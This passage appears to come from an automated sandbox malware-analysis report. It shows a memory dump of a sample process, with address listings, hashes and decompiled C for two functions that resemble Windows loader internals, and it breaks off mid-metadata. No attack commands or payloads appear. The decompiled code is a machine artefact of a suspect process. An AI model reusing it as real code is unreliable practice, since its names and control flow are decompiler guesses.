                                        0x016b849b
                                        0x016b849d
                                        0x016b84a2
                                        0x016b84a7
                                        0x016b84b1
                                        0x016b84d8
                                        0x00000000
                                        0x016b84b3
                                        0x016b84c4
                                        0x016b84c9
                                        0x016b84cd
                                        0x016b84cf
                                        0x016b84cf
                                        0x016b84d6
                                        0x016b84e6
                                        0x016b84e9
                                        0x016b84ec
                                        0x016b84ef
                                        0x016b84f2
                                        0x016b84f4
                                        0x016b84fc
                                        0x016b8501
                                        0x016b8506
                                        0x016b8509
                                        0x016b86e0
                                        0x016b86e5
                                        0x016b86e8
                                        0x016b86ed
                                        0x016b86f0
                                        0x016b86f2
                                        0x01709afd
                                        0x01709b02
                                        0x016b84da
                                        0x016b84df
                                        0x016b84df
                                        0x016b86fa
                                        0x016b86fd
                                        0x016b86fe
                                        0x016b8701
                                        0x016b8706
                                        0x016b8709
                                        0x016b870b
                                        0x00000000
                                        0x00000000
                                        0x016b8711
                                        0x016b8725
                                        0x016b8727
                                        0x016b872a
                                        0x016b872c
                                        0x01709af0
                                        0x01709af5
                                        0x016b8732
                                        0x016b8732
                                        0x016b8732
                                        0x016b8735
                                        0x016b8737
                                        0x016b8515
                                        0x016b8515
                                        0x016b8518
                                        0x016b851d
                                        0x016b8523
                                        0x016b8527
                                        0x016b852b
                                        0x016b8537
                                        0x016b8539
                                        0x016b853c
                                        0x016b853e
                                        0x016b868c
                                        0x016b8691
                                        0x016b8699
                                        0x016b869b
                                        0x016b8744
                                        0x016b8748
                                        0x016b86a1
                                        0x016b86a1
                                        0x016b86a1
                                        0x016b86a4
                                        0x016b86a8
                                        0x01709bdf
                                        0x01709bdf
                                        0x016b86ae
                                        0x016b86b0
                                        0x00000000
                                        0x016b86b6
                                        0x00000000
                                        0x01709be9
                                        0x016b86b0
                                        0x016b8544
                                        0x016b854a
                                        0x016b854d
                                        0x016b8551
                                        0x016b876e
                                        0x016b8778
                                        0x016b877b
                                        0x016b8780
                                        0x016b8557
                                        0x016b8557
                                        0x016b855d
                                        0x016b855d
                                        0x016b856b
                                        0x016b856e
                                        0x016b8570
                                        0x016b8573
                                        0x016b8576
                                        0x016b8576
                                        0x016b8579
                                        0x016b857b
                                        0x00000000
                                        0x00000000
                                        0x016b8581
                                        0x016b85a0
                                        0x016b85a2
                                        0x016b85a5
                                        0x016b85a7
                                        0x01709b1b
                                        0x01709b1b
                                        0x016b862e
                                        0x016b862e
                                        0x016b8631
                                        0x016b8631
                                        0x016b8634
                                        0x016b8636
                                        0x016b8669
                                        0x016b8669
                                        0x016b866b
                                        0x01709bbf
                                        0x01709bc4
                                        0x01709bc8
                                        0x01709bce
                                        0x01709bce
                                        0x016b8671
                                        0x016b8671
                                        0x016b8674
                                        0x016b8676
                                        0x01709bae
                                        0x01709bae
                                        0x016b8676
                                        0x016b867c
                                        0x016b867e
                                        0x016b8688
                                        0x016b8688
                                        0x00000000
                                        0x016b867e
                                        0x016b8638
                                        0x016b8638
                                        0x016b863b
                                        0x016b863e
                                        0x016b863f
                                        0x016b8642
                                        0x016b8645
                                        0x016b8648
                                        0x016b864d
                                        0x01709b69
                                        0x01709b6e
                                        0x01709b7b
                                        0x01709b81
                                        0x01709b85
                                        0x01709b89
                                        0x01709ba7
                                        0x01709b8b
                                        0x01709b91
                                        0x01709b9a
                                        0x01709b9f
                                        0x01709b9f
                                        0x016b8788
                                        0x016b878d
                                        0x016b8763
                                        0x016b8763
                                        0x016b8766
                                        0x00000000
                                        0x016b8766
                                        0x01709b70
                                        0x00000000
                                        0x01709b70
                                        0x016b8656
                                        0x016b865a
                                        0x016b865c
                                        0x016b8752
                                        0x016b8756
                                        0x00000000
                                        0x00000000
                                        0x016b875e
                                        0x00000000
                                        0x016b875e
                                        0x016b8662
                                        0x016b8662
                                        0x016b8662
                                        0x016b8666
                                        0x00000000
                                        0x016b8666
                                        0x016b85b7
                                        0x016b85b9
                                        0x016b85bc
                                        0x016b85bf
                                        0x016b85cc
                                        0x016b85d1
                                        0x016b85d4
                                        0x016b85db
                                        0x016b85de
                                        0x016b85e0
                                        0x01709b5f
                                        0x00000000
                                        0x01709b5f
                                        0x016b85e6
                                        0x016b85ea
                                        0x016b86c3
                                        0x016b86c5
                                        0x016b86c8
                                        0x016b86ca
                                        0x01709b16
                                        0x00000000
                                        0x01709b16
                                        0x016b86d6
                                        0x016b85f6
                                        0x016b85f6
                                        0x016b85f9
                                        0x016b8602
                                        0x016b8606
                                        0x016b860a
                                        0x016b860b
                                        0x016b860e
                                        0x016b8611
                                        0x00000000
                                        0x016b8611
                                        0x016b85f3
                                        0x00000000
                                        0x016b85f3
                                        0x016b8619
                                        0x016b861e
                                        0x016b861e
                                        0x016b8621
                                        0x016b8622
                                        0x016b8623
                                        0x016b8625
                                        0x016b862c
                                        0x00000000
                                        0x016b873d
                                        0x00000000
                                        0x016b873d
                                        0x016b8737
                                        0x016b850f
                                        0x016b8512
                                        0x00000000
                                        0x016b8512
                                        0x00000000
                                        0x016b84d6

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c55728b1e822744881686f01291d503a4737bbc2fa11c3c6f4c072fe3a630f84
                                        • Instruction ID: c0880d27e59f72a61b4f2ef0492e669683dbe31338c43db30edb5d6c33755029
                                        • Opcode Fuzzy Hash: c55728b1e822744881686f01291d503a4737bbc2fa11c3c6f4c072fe3a630f84
                                        • Instruction Fuzzy Hash: 63B129B4E00219DFDB25DF99CD84AEDBBBABF48314F10412EE505AB345E770A986CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016D513A Relevance: .3, Instructions: 258COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 67%
                                        			E016D513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x179d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E016ED0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E016C2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L016C4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E016EF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E016BFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x179b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E016EB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                        0x016d5142
                                        0x016d514c
                                        0x016d5150
                                        0x016d5157
                                        0x016d5159
                                        0x016d515e
                                        0x016d5165
                                        0x016d5169
                                        0x016d516c
                                        0x016d5172
                                        0x016d5176
                                        0x016d517a
                                        0x016d517a
                                        0x016d517a
                                        0x016d517f
                                        0x01716d8b
                                        0x01716d8e
                                        0x01716d91
                                        0x01716d95
                                        0x01716d98
                                        0x01716d9c
                                        0x01716da0
                                        0x01716da3
                                        0x01716da7
                                        0x01716e26
                                        0x01716e26
                                        0x01716e2a
                                        0x016d51f9
                                        0x016d51f9
                                        0x016d51fe
                                        0x01716e33
                                        0x01716e33
                                        0x01716e39
                                        0x01716e3d
                                        0x01716e46
                                        0x01716e50
                                        0x00000000
                                        0x00000000
                                        0x01716e52
                                        0x01716e53
                                        0x01716e56
                                        0x01716e5d
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x01716e5f
                                        0x01716e67
                                        0x01716e77
                                        0x01716e7f
                                        0x01716e80
                                        0x01716e88
                                        0x01716e90
                                        0x01716e9f
                                        0x01716ea5
                                        0x01716ea9
                                        0x01716eb1
                                        0x01716ebf
                                        0x00000000
                                        0x00000000
                                        0x01716ecf
                                        0x01716ed3
                                        0x00000000
                                        0x00000000
                                        0x01716edb
                                        0x01716ede
                                        0x01716ee1
                                        0x01716ee8
                                        0x01716eeb
                                        0x01716eed
                                        0x01716ef0
                                        0x01716ef4
                                        0x01716ef8
                                        0x01716efc
                                        0x00000000
                                        0x00000000
                                        0x01716f0d
                                        0x01716f11
                                        0x01716f32
                                        0x01716f37
                                        0x01716f3b
                                        0x01716f3e
                                        0x01716f41
                                        0x01716f46
                                        0x00000000
                                        0x00000000
                                        0x01716f4c
                                        0x01716f50
                                        0x01716f50
                                        0x01716f54
                                        0x01716f62
                                        0x01716f65
                                        0x01716f6d
                                        0x01716f7b
                                        0x01716f7b
                                        0x01716f93
                                        0x01716f98
                                        0x01716fa0
                                        0x01716fa6
                                        0x01716fb3
                                        0x01716fb6
                                        0x01716fbf
                                        0x01716fc1
                                        0x01716fd5
                                        0x01716fda
                                        0x01716fda
                                        0x01716fdd
                                        0x01716fe2
                                        0x01716fe7
                                        0x01716feb
                                        0x01716fef
                                        0x01716ff3
                                        0x016d520c
                                        0x016d520c
                                        0x016d520f
                                        0x016d5215
                                        0x016d5234
                                        0x016d523a
                                        0x016d523a
                                        0x016d5244
                                        0x016d5245
                                        0x016d5246
                                        0x016d5251
                                        0x016d5251
                                        0x01716f13
                                        0x01716f17
                                        0x01716f17
                                        0x01716f18
                                        0x01716f1b
                                        0x01716f1f
                                        0x01716f23
                                        0x00000000
                                        0x01716f28
                                        0x016d5204
                                        0x016d5204
                                        0x016d5208
                                        0x00000000
                                        0x016d5208
                                        0x016d5185
                                        0x016d5188
                                        0x016d518a
                                        0x016d518e
                                        0x016d5195
                                        0x01716db1
                                        0x01716db5
                                        0x01716db9
                                        0x016d519b
                                        0x016d519b
                                        0x016d519e
                                        0x016d51a7
                                        0x016d51a9
                                        0x016d51a9
                                        0x016d51b5
                                        0x016d51b8
                                        0x016d51bb
                                        0x016d51be
                                        0x016d51c1
                                        0x016d51c5
                                        0x016d51c9
                                        0x016d51cd
                                        0x016d51cd
                                        0x016d51d8
                                        0x016d51dc
                                        0x016d51e0
                                        0x01716dcc
                                        0x01716dd0
                                        0x01716dd5
                                        0x01716ddd
                                        0x01716de1
                                        0x01716de1
                                        0x01716de5
                                        0x01716deb
                                        0x01716df1
                                        0x01716df7
                                        0x01716dfd
                                        0x01716e01
                                        0x01716e05
                                        0x01716e09
                                        0x01716e0d
                                        0x01716e11
                                        0x01716e11
                                        0x016d51eb
                                        0x01716e1a
                                        0x01716e1f
                                        0x01716e21
                                        0x01716e23
                                        0x00000000
                                        0x016d51f1
                                        0x016d51f1
                                        0x00000000
                                        0x016d51f1

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5da73f034bb7f69b936d6d428e1c3eee3d3818f99a12b53729a922afab04d5d6
                                        • Instruction ID: 4d4a95a7a78d2c1d3c37e50c99fad5f0d0906462e120b170c80197ee0efb23bc
                                        • Opcode Fuzzy Hash: 5da73f034bb7f69b936d6d428e1c3eee3d3818f99a12b53729a922afab04d5d6
                                        • Instruction Fuzzy Hash: 27C114755093818FD354CF28C980A6AFBF1BF88704F148A6EF9998B352D771E985CB42
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016D03E2 Relevance: .3, Instructions: 254COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 74%
                                        			E016D03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x179d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E016D0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E016EB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E016BB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x1797c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E016C7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E016C7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E01727016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E016E9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E017269A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x1797c04 != 0) {
						_t118 = _v12;
						_t120 = E0172A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x1797bd8;
						if( *0x1797bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E016E95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E016E99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E01723540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E016AB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E016EAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x1798474 - 3;
										if( *0x1798474 != 3) {
											 *0x17979dc =  *0x17979dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E016C7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E016C7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E01727016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x1798708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x1797b00; // 0x0
							asm("ror esi, cl");
							 *0x179b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E016E95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E016B7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                        0x016d03f1
                                        0x016d03f7
                                        0x016d03f9
                                        0x016d03fb
                                        0x016d03fd
                                        0x016d0400
                                        0x016d040a
                                        0x01714c7a
                                        0x016d0537
                                        0x016d0547
                                        0x016d0410
                                        0x016d0410
                                        0x016d0414
                                        0x016d0417
                                        0x016d041a
                                        0x016d0421
                                        0x016d0424
                                        0x016d042b
                                        0x016d043b
                                        0x016d043e
                                        0x016d043f
                                        0x016d043f
                                        0x016d0446
                                        0x016d0449
                                        0x016d044c
                                        0x016d044f
                                        0x016d0459
                                        0x01714c8d
                                        0x016d045f
                                        0x016d045f
                                        0x016d045f
                                        0x016d0467
                                        0x01714c97
                                        0x01714c9d
                                        0x01714ca4
                                        0x01714caa
                                        0x01714caf
                                        0x01714cb1
                                        0x01714cc3
                                        0x01714cb3
                                        0x01714cbc
                                        0x01714cbc
                                        0x01714cc8
                                        0x01714ccb
                                        0x01714cd7
                                        0x01714cda
                                        0x01714cdf
                                        0x01714cdf
                                        0x01714ccb
                                        0x01714ca4
                                        0x016d046d
                                        0x016d046f
                                        0x016d046f
                                        0x016d0471
                                        0x016d0476
                                        0x016d047a
                                        0x016d047b
                                        0x016d0483
                                        0x016d0489
                                        0x016d048d
                                        0x00000000
                                        0x00000000
                                        0x01714ce9
                                        0x01714cef
                                        0x01714d22
                                        0x01714d22
                                        0x00000000
                                        0x01714d22
                                        0x01714cf1
                                        0x01714cf7
                                        0x00000000
                                        0x00000000
                                        0x01714cf9
                                        0x01714cff
                                        0x00000000
                                        0x00000000
                                        0x01714d05
                                        0x01714d07
                                        0x00000000
                                        0x00000000
                                        0x01714d0d
                                        0x01714d0f
                                        0x01714d14
                                        0x01714d16
                                        0x00000000
                                        0x00000000
                                        0x01714d1c
                                        0x01714d1c
                                        0x016d0499
                                        0x016d0535
                                        0x016d0535
                                        0x00000000
                                        0x016d0535
                                        0x016d04a6
                                        0x01714d2c
                                        0x01714d37
                                        0x01714d39
                                        0x01714d3b
                                        0x00000000
                                        0x00000000
                                        0x01714d41
                                        0x01714d48
                                        0x016d0527
                                        0x016d052b
                                        0x016d052d
                                        0x016d0530
                                        0x016d0530
                                        0x00000000
                                        0x016d052b
                                        0x01714d4e
                                        0x016d04ac
                                        0x016d04ac
                                        0x016d04af
                                        0x016d04b2
                                        0x016d04b7
                                        0x016d04b9
                                        0x016d04bb
                                        0x016d04bd
                                        0x016d04bf
                                        0x016d04c5
                                        0x016d04c9
                                        0x01714d53
                                        0x01714d59
                                        0x01714db9
                                        0x01714dba
                                        0x01714dbf
                                        0x01714dc2
                                        0x01714dc4
                                        0x01714dc7
                                        0x01714dce
                                        0x00000000
                                        0x01714dce
                                        0x01714d5b
                                        0x01714d61
                                        0x00000000
                                        0x00000000
                                        0x01714d63
                                        0x01714d69
                                        0x00000000
                                        0x00000000
                                        0x01714d6b
                                        0x01714d6e
                                        0x01714d74
                                        0x01714d76
                                        0x01714d7c
                                        0x01714d7e
                                        0x01714d84
                                        0x01714d89
                                        0x01714d8c
                                        0x01714d8d
                                        0x01714d92
                                        0x01714d95
                                        0x01714d96
                                        0x01714d98
                                        0x01714d9a
                                        0x01714d9f
                                        0x01714da4
                                        0x01714da6
                                        0x01714da8
                                        0x01714daf
                                        0x01714db1
                                        0x01714db1
                                        0x01714daf
                                        0x01714da6
                                        0x01714d84
                                        0x01714d7c
                                        0x00000000
                                        0x01714d74
                                        0x016d04d6
                                        0x01714de1
                                        0x016d04dc
                                        0x016d04dc
                                        0x016d04dc
                                        0x016d04e4
                                        0x01714deb
                                        0x01714df1
                                        0x01714df8
                                        0x01714dfe
                                        0x01714e03
                                        0x01714e05
                                        0x01714e17
                                        0x01714e07
                                        0x01714e10
                                        0x01714e10
                                        0x01714e1c
                                        0x01714e1f
                                        0x01714e35
                                        0x01714e35
                                        0x01714e1f
                                        0x01714df8
                                        0x016d04f1
                                        0x016d04fa
                                        0x01714e3f
                                        0x01714e47
                                        0x01714e5b
                                        0x01714e61
                                        0x01714e67
                                        0x01714e69
                                        0x01714e71
                                        0x01714e73
                                        0x016d0500
                                        0x016d0500
                                        0x016d0500
                                        0x016d04fa
                                        0x016d0508
                                        0x016d051d
                                        0x016d051d
                                        0x016d051f
                                        0x016d0524
                                        0x00000000
                                        0x016d0524
                                        0x016d0515
                                        0x016d0517
                                        0x01714e7a
                                        0x01714e7c
                                        0x00000000
                                        0x00000000
                                        0x01714e85
                                        0x00000000
                                        0x01714e85
                                        0x00000000
                                        0x016d0517

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9f484e196b4f6e4d18f8be677049980f25be93c4bb78ebca498b4ee879c0a56f
                                        • Instruction ID: 6c590aa484f69954e50d885a1e9bc250bc55a920dd9b9bb77ab359237cd5c645
                                        • Opcode Fuzzy Hash: 9f484e196b4f6e4d18f8be677049980f25be93c4bb78ebca498b4ee879c0a56f
